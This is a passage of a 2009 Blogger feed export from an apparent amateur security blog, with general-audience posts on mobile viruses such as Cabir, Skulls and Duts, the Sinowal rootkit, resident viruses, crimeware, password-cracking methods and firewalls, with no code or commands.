PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-4732062475784526160</id><published>2009-06-19T05:24:00.001-07:00</published><updated>2009-06-19T05:24:00.731-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DUTS'/><category scheme='http://www.blogger.com/atom/ns#' term='mobile virus'/><title type='text'>Duts Mobile Virus</title><content type='html'>After the invasion of the Cabir, a new mobile virus called WinCE/Duts was discovered in July 2004. One of the interesting characteristics of the virus is that it first asks the user for permission to infect the files. When an infected file is executed, the virus pops up a message box asking:&lt;br /&gt;Dear User, am I allowed to spread?&lt;br /&gt;When the user press "Yes", the virus will infect all the EXE files in the current directory. Duts contains two messages that are not displayed:&lt;br /&gt;This is proof of concept code. Also, i wanted to make avers happy.&lt;br /&gt;The situation when Pocket PC antiviruses detect only EICAR file had to end ...&lt;br /&gt;Duts is a 1520 bytes long program written in the assembly language for the ARM processor. It affects the devices running on the Windows CE Operating System.&lt;br /&gt;  &lt;div class="flockcredit" style="text-align: right; color: #CCC; font-size: x-small;"&gt;Blogged with the &lt;a href="http://www.flock.com/blogged-with-flock" style="color: #999; font-weight: bold;" target="_new" title="Flock Browser"&gt;Flock Browser&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-4732062475784526160?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/4732062475784526160/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/duts-mobile-virus.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4732062475784526160'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4732062475784526160'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/duts-mobile-virus.html' title='Duts Mobile Virus'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-6178557499674151158</id><published>2009-06-17T22:57:00.000-07:00</published><updated>2009-06-17T23:15:28.655-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Skulls'/><category scheme='http://www.blogger.com/atom/ns#' term='removal'/><category scheme='http://www.blogger.com/atom/ns#' term='mobilevirus'/><title type='text'>Skulls Mobile Virus</title><content type='html'>I have given a brief idea about the viruses affecting the mobile phones. Skulls is one of the notorious trojan that affect the mobile phones. Skulls is a SIS file trojan that affects the phones running on Symbian OS. The virus replaces the applications installed in the phone with the non-functional versions so that the phone became almost useless.&lt;br /&gt;Most people wanted to make the user interface of the mobile phones more attractive. For this purpose they install themes. Sometimes the installed theme file may be "Extended theme.SIS" which informs you that it is the theme manager for Nokia 7610 smart phone. Then beware-you may have installed Skulls virus. After the Skulls get the control of your mobile, you will see all the icons of the applications in the menu will be replaced by the image of skulls. I have provided a screenshot below:&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_mPzqYV2-K04/SjnbQ2nZmnI/AAAAAAAAAHE/iSpuXjOVGxE/s1600-h/skullscr.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 202px; height: 241px;" src="http://4.bp.blogspot.com/_mPzqYV2-K04/SjnbQ2nZmnI/AAAAAAAAAHE/iSpuXjOVGxE/s320/skullscr.gif" alt="" id="BLOGGER_PHOTO_ID_5348547115064334962" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Fortunately Skulls allows to make and receive calls. But all other application including SMS and MMS will be disabled by Skulls. If you find that your phone contains Skull virus it is more important that you should not reboot your phone. Rebooting the phone will make it difficult for removing the Skull virus.Skulls trojans are targeted against Symbian Series 60 devices, but it can also affect other Symbian devices, for example Nokia 9500, which is a Series 80 device. However when trying to install Skulls trojan on Nokia 9500, user will get a warning that the SIS file is not intended for the device, so risk of accidental infection is low.&lt;br /&gt;For manual removal of Skulls from a compromised device, it is necessary to reinstall all overwritten applications. The SymbOS/Skulls SIS installer must then be deleted. If this does not restore the phone, a formatting the phone may be necessary. All data saved in the C drive will be lost during a format.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-6178557499674151158?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/6178557499674151158/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/skulls-mobile-virus.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6178557499674151158'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6178557499674151158'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/skulls-mobile-virus.html' title='Skulls Mobile Virus'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_mPzqYV2-K04/SjnbQ2nZmnI/AAAAAAAAAHE/iSpuXjOVGxE/s72-c/skullscr.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-2704643007282270978</id><published>2009-06-17T00:58:00.001-07:00</published><updated>2009-06-17T00:58:59.917-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mobilevirus'/><category scheme='http://www.blogger.com/atom/ns#' term='cabir'/><title type='text'>Mobile Viruses</title><content type='html'>The mobile phones have become a part of our life. Now it is hard to image a day without mobile phones. As the technology advanced, the mobile phones became more and more sophisticated and became more user friendly and includes lots of functions. mobile phones keep as always connected to our dear ones. Even the mobile phones creates small radiation problems, people ignores it and becomes victim of the harmful diseases. But the number of peoples using the mobile phones is increasing day by day. This put the mobile phone manufactures in tough competition. So the manufactures develop new variety of phones. Thus today's mobiles phones can be called as a mobile computer since it corporate almost all the functions of the personal computer. Most of the costly mobile phones are using advanced Operating Systems like Symbian OS, etc. They allows the user to even connect to the internet. The growth of the mobile phone technology in the constructive side gives birth to its destructive side also. Thus the viruses for the mobile phones and PDA took birth. Fortunately the mobile phones which run on Operating Systems that is made entirely for that specific series of mobile phones are almost safe from the virus attack. But the blue tooth enbled mobiles are becoming the victim of virus attack.&lt;br /&gt;&amp;nbsp;A mobile virus is a electronic virus that infects mobile phones or the wireless enabled PDAs. The first case of a mobile virus was reported in June 2004 when it was discovered that a company called Ojam had engineered an anti-piracy Trojan virus in older versions of their mobile phone game Mosquito. This virus sent SMS text messages to the company without the user's knowledge. This virus was removed from more recent versions of the game; however it still exists on older, unlicensed versions. These older versions may still be distributed on file-sharing networks and free software download web sites. &lt;br /&gt;In July 2004, computer hobbyists released a proof-of-concept mobile virus named Cabir. Cabir is also known as EPOC.cabir and Symbian/Cabir that is designed to infect mobile phones running Symbian OS. When a phone is infected with Cabir, the message "Caribe" is displayed on the phone's display, and is displayed every time the phone is turned on. The worm then attempts to spread to other phones in the area using wireless Bluetooth signals. The worm was not sent out into the wild, but sent directly to anti-virus firms, who believe Cabir in its current state is harmless. However, it does prove that mobile phones are also at risk from virus writers. Experts also believe that the worm was developed by a group who call themselves 29A, a group of international hackers, as a "proof of concept" worm in order to catch world attention. It failed to infect any of its targets. The worm can attack and replicate on Bluetooth enabled Series 60 phones. The worm tries to send itself to all Bluetooth enabled devices that support the "Object Push Profile", which can also be non-Symbian phones, desktop computers or even printers. Symantec reports that the worm spreads as a .SIS file installed in the Apps directory. Unlike actual PC worms, Cabir does not spread if the user does not accept the file-transfer or does not agree with the installation. F-Secure reports that some phones, at least, warn the user about an unverified supplier.[1] So, like many other worms, this sample also needs a good portion of social engineering to reach its goal. While the worm is considered harmless because it replicates but does not perform any other activity, it will result in shortened battery life on portable devices due to constant scanning for other Bluetooth enabled devices. Mabir, a variant of Cabir, is capable of spreading not only via Bluetooth but also via MMS. By sending out copies of itself as a .sis file over cellular networks, it can affect even users who are outside the 10m range of Bluetooth.&lt;br /&gt;&amp;nbsp;In March 2005 it was reported that a computer worm called Commwarrior-A has been infecting Symbian series 60 mobile phones. This worm replicates itself through the phone's Multimedia Messaging System (MMS). It sends copies of itself to other phone owners listed in the phone user's address book. Although the worm is not considered harmful, experts agree that it heralds a new age of electronic attacks on mobile phones.&lt;br /&gt;The other known mobile viruses are: Duts, Skulls, Commwarrior, etc. The details of these viruses will be published later.&lt;br /&gt;  &lt;div class="flockcredit" style="text-align: right; color: #CCC; font-size: x-small;"&gt;Blogged with the &lt;a href="http://www.flock.com/blogged-with-flock" style="color: #999; font-weight: bold;" target="_new" title="Flock Browser"&gt;Flock Browser&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-2704643007282270978?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/2704643007282270978/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/mobile-viruses.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2704643007282270978'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2704643007282270978'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/mobile-viruses.html' title='Mobile Viruses'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-5415891855369331134</id><published>2009-06-12T22:33:00.001-07:00</published><updated>2009-06-12T22:33:41.591-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Actifed'/><title type='text'>Actifed Computer Virus</title><content type='html'>Actifed virus is a type of G2 generated encrypted computer virus. As normally the virus is loaded in to the memory by executing an infected program and then it affects the runtime programs and then corrupts the program files.This virus affects the .COM and .EXE file but does not affect the command.com. G2 generates compact, easily modified, fully commented, source code of .COM and .EXE infectors. It also supports the creation of resident and non-resident encrypted and non-encrypted viruses. The PS-MPC has similar use.&lt;br /&gt;&lt;br /&gt;  &lt;div class="flockcredit" style="text-align: right; color: #CCC; font-size: x-small;"&gt;Blogged with the &lt;a href="http://www.flock.com/blogged-with-flock" style="color: #999; font-weight: bold;" target="_new" title="Flock Browser"&gt;Flock Browser&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-5415891855369331134?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/5415891855369331134/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/actifed-computer-virus.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/5415891855369331134'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/5415891855369331134'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/actifed-computer-virus.html' title='Actifed Computer Virus'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-2147219931042127125</id><published>2009-06-01T06:18:00.001-07:00</published><updated>2009-06-01T06:18:56.731-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='sinowal'/><category scheme='http://www.blogger.com/atom/ns#' term='kaspersky'/><title type='text'>Computer Virus Sinowal</title><content type='html'>Kaspersky reports that the virusthreat has increased during the month of April 2009. The new malwares exploit the security flaws in Adobe Acrobat Reader of the pdf software or the Neosploit rootkit. According to the researchers the detection and the cure of the rootkits is a very difficult problem faced by the antivirus experts.&lt;br /&gt;Kaspersky Research Lab has detected a fresh version of the Sinowal at the end of March 2009. Sinowal is a vicious code that remains itself hidden in an infected computer by infecting its Master Boot Record (MBR). Sinowal plants itself in the lowest level of the Operating System. It infects the MBR and bypasses the antivirus software. The e-mails were considered as the main medium for the spreading of the malwares through the internet. But the infection through the website has increased 300% by the year 2008. Now the malwares redirect the search results and confuses the user. Kaspersky recomends its users to make their antivirus up-to-date and scan for the malware. If any malware is found, system will have to be restarted while undergoing treatment.&lt;br /&gt;  &lt;div class="flockcredit" style="text-align: right; color: #CCC; font-size: x-small;"&gt;Blogged with the &lt;a href="http://www.flock.com/blogged-with-flock" style="color: #999; font-weight: bold;" target="_new" title="Flock Browser"&gt;Flock Browser&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-2147219931042127125?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/2147219931042127125/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/computer-virus-sinowal.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2147219931042127125'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/2147219931042127125'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/06/computer-virus-sinowal.html' title='Computer Virus Sinowal'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-5922058422778526227</id><published>2009-05-30T01:02:00.001-07:00</published><updated>2009-05-30T01:02:54.048-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='firewall'/><category scheme='http://www.blogger.com/atom/ns#' term='internetsecurity'/><title type='text'>Software Firewall</title><content type='html'>You may have heard the term firewall. If you have a network of computers (say 50 computers in the network) you will implement a firewall to protect your network from the cyber attacks. A firewall controls the ports that are used to communicate with the network. You can implement your own laws concerning the security of the network. You can allow the FTP to restricted number of computers. You can also regulate the computer from visiting certain restricted sites. If the network is large the security must be as tight. But what about the case of one or two computers connected to the internet ? The software firewall is the solution. Te software firewall examines the ports connected to the internet and regulates it. It also asks the user whenever an applicayion installed in the computer try to access the internet. Thus we can prevent unwanted usage of the internet by the unknown application. This also saves our band width. The usage of internet connection by the unknown application is generally a trojan or spyware. &lt;br /&gt;The usage of the software firewall is not limited to the small network. It is also used in the huge network to regulate the usage of the internet by the employees. &lt;br /&gt;&lt;hr style="width: 100%; height: 2px;" /&gt;The firewall uses the following ways to prevent the unwanted data transfer through the internet.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Proxy Service: The information received from the internet is received and it is forwarded to the requesting system. It can also receive the information (request) sent by a computer in the network and forward it to the corresponding destination.&lt;/li&gt;&lt;li&gt;Packet Filtereing: The information to be sent are breakdown into small units and are converted to packets. These packets are first received by the firewall and checks it with a set of predefined filters. The firewall allows only the trusted packets to pass to the requesting computer.&lt;/li&gt;&lt;li&gt;Stateful Inspection: It is a newer method. It does not checks the whole packet. Instaed it checks for only certain parts of the packet. It checks specific part of the data while sending the request and compares it with the incomming packets. If a match is found the packet is considered as a trusted packet and allowed to pass through the network otherwise it is blocked.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;  &lt;div class="flockcredit" style="text-align: right; color: #CCC; font-size: x-small;"&gt;Blogged with the &lt;a href="http://www.flock.com/blogged-with-flock" style="color: #999; font-weight: bold;" target="_new" title="Flock Browser"&gt;Flock Browser&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-5922058422778526227?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/5922058422778526227/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/software-firewall.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/5922058422778526227'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/5922058422778526227'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/software-firewall.html' title='Software Firewall'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-72779996034830649</id><published>2009-05-24T21:43:00.000-07:00</published><updated>2009-05-24T22:00:13.002-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='new virus'/><category scheme='http://www.blogger.com/atom/ns#' term='US Marshals'/><category scheme='http://www.blogger.com/atom/ns#' term='FBI'/><category scheme='http://www.blogger.com/atom/ns#' term='Virus attack'/><title type='text'>Computer virus strikes US Marshals, FBI affected</title><content type='html'>A mystery computer virus affected the computer networks of the US Marshals and FBI. Both of them had shut down their network to prevent further spreading and destruction. The computer network have been disconnected from the Justice Department as a preventive measure. The problem of virus starts in the Thursday. The origin of the virus has not been identified. Besides the external network, the law enforcement department has its own internal network to prevent the snoopers from accessing the sensitive data. The internet access and e-mail services of the US Marshals and FBI had been disabled while the staff worked on the problem.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-72779996034830649?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/72779996034830649/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/computer-virus-strikes-us-marshals-fbi.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/72779996034830649'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/72779996034830649'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/computer-virus-strikes-us-marshals-fbi.html' title='Computer virus strikes US Marshals, FBI affected'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-3586543144955818294</id><published>2009-05-21T02:46:00.000-07:00</published><updated>2009-05-21T03:25:15.598-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='computer virus'/><category scheme='http://www.blogger.com/atom/ns#' term='resident virus'/><title type='text'>Resident Virus</title><content type='html'>As you know a virus will normally infect an executable file and it will be executed when the infected file is executed. According to the mode of infection the viruses are divided into resident and non-resident viruses. The non resident virus has a module to find the files that it can infect and it also has another module called replication module which will infect the file encountered by the finding module. After infecting a particular file the virus will be executed when the infected file is executed.&lt;br /&gt;In the case of the resident virus, the thing is different. They first infect a file or executed by some other means. When they are executed it loads its replication module into the memory. By working in the memory it is capable of infecting the files to a great extend. So there are two types of resident viruses- those which are capable of infecting large number of files in a short duration called fast infectors and the other that infects less number of files. The fast infecting type virus is somewhat more dangerous since it infect more potential programs in a short duration. If the infected potential files include the files of the antivirus then there is a chance of infecting the files scanned by the antivirus. The fast infecting virus shows the symptoms of infection very soon, mostly by slowing down the PC. There are antiviruses that will be active when there is an abnormality is identified and it will disinfect the infected file. In the case of slow infectors, they do not show the symptoms of infection as slowing downing the PC. This makes them less chance to be identified by the antivirus. But do not remain unidentified forever. Since it shows the signs of infection very late, they are identified very late. However it is less dangerous than that of the fast infectors.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-3586543144955818294?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/3586543144955818294/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/resident-virus.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/3586543144955818294'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/3586543144955818294'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/resident-virus.html' title='Resident Virus'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-698171566138393461</id><published>2009-05-17T05:28:00.000-07:00</published><updated>2009-05-17T06:00:43.965-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='crimewares'/><category scheme='http://www.blogger.com/atom/ns#' term='trojans'/><title type='text'>Crimeware</title><content type='html'>Crimewares are applications that are developed to steal the personal information or to commit a crime. Usually crimeware are used to steal money from the accounts of the companies or the traders that makes the thief richer. Crimeware uses several methods. The attacker can use a keylogger trojan fro stealing the kestrokes from the user. The user may be an employ of a bank or other finantial institution. The attacker can use this stealed information for his job. Another method is by redirecting the user to a fake website even if the user has entered the url correctly. the crimeware allows the attacker to wait till the user login in to his account and the he can steal the information without identified by the user. The crimeware can steal password from the cache of the browser. The crimeware uses the vulnerabilities in the applications that uses internet connection. The attack may also in the form of an e-mail which provides fake sender details.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-698171566138393461?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/698171566138393461/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/crimeware.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/698171566138393461'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/698171566138393461'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/crimeware.html' title='Crimeware'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-590966507378196260</id><published>2009-05-16T07:45:00.000-07:00</published><updated>2009-05-16T08:30:45.031-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='cracking'/><title type='text'>Password Cracking</title><content type='html'>Password cracking is the process of recovering the password. Usually password cracking is used to find out the password lost by the user. Like every development in the technology, this is also used for illegal purposes. Password cracking is used for hacking purposes. Password cracking is used for determining the active passwords of the email by the attackers. The password they crack include passwords of the website, computer, domains etc.&lt;br /&gt;In most of the networks authentication is used to allow the limited access to the network. The authentication is generally done by using the user name and password. Without the user name or password a computer is not allowed to access the network. In most cases the password is not stored in the plain text form. The password in the plain text form is more vulnerable to attack. For the security reasons the password is encrypted. Encryption is done in different  method is the password is mixed with certain data and the resultant form is stored in the corresponding database. If an attacker gets this encrypted password it will be easier for him to find out the original password.&lt;br /&gt;One of the method of password cracking is by guessing. If the attacker knows a user he guesses the password by simply checks the password by giving the names of the friend, pet,favorite celebrities etc. The other type of guessing involves the trial and error method using the common password words like admin,administrator, password, passcard etc.&lt;br /&gt;Another type of finding password is by using a software which generates the password like words from the dictionary. A good percentage of the people creates password from the words in the dictionary. Some people may prefix or postfix a digit which is usually 1.&lt;br /&gt;The another type of attack is the brute force attack. This has higher chance of success  if the password is small. That is why the most of the sites requiring authentication asks for password with more than 6 characters. The brute force attack uses every words that may have the chance for becoming the password.&lt;br /&gt;Precomputation is another method of finding password. This method involves hashing of each word in the dictionary and stores it. This way when a new encrypted password is obtained password recovery is very easy.&lt;br /&gt;The password cracking can be prevented by using the high encryption during the transmission. In the case of password stored in the system, the password must be accessible only to the trusted applications.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-590966507378196260?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/590966507378196260/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/password-cracking.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/590966507378196260'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/590966507378196260'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2009/05/password-cracking.html' title='Password Cracking'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-5567400287503915308</id><published>2009-05-14T23:12:00.000-07:00</published><updated>2009-05-15T00:29:23.528-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='internet security'/><title type='text'>Know your Computer's internet security</title><content type='html'>You may know that a computer can communicate with other computer only through the ports. A computer can be connected to the internet only through the ports. A computer has thousands of ports. But we require only a fewer ports. If  a remote computer needs a port, it sends request to the computer for accessing a particular port. Each port is identified by its port number. The computer receives the request and allows the program in the remote computer to access the computer. This is the normal case. I mean the ideal case. But the programs in the remote computer are human created and so there is a chance for the presence of the error. Moreover some programs are malware that uses the trusted programs to get in to the computer. By closing the unnecessary ports we can prevent the remote computer from accessing our computer up to a limit. But this will not protect your computer completely from the attacks through the internet. This only reduces the chance of attack through the internet connection. For knowing which ports are opened and which are closed visit: &lt;a href="http://scan.sygate.com/"&gt;http://scan.sygate.com/&lt;/a&gt;&lt;br /&gt;If you use a firewall software you can manage the programs from accessing the internet. You can block the unwanted programs from accessing the internet. But the presence of rootkits can even cheat the firewall&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-5567400287503915308?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' 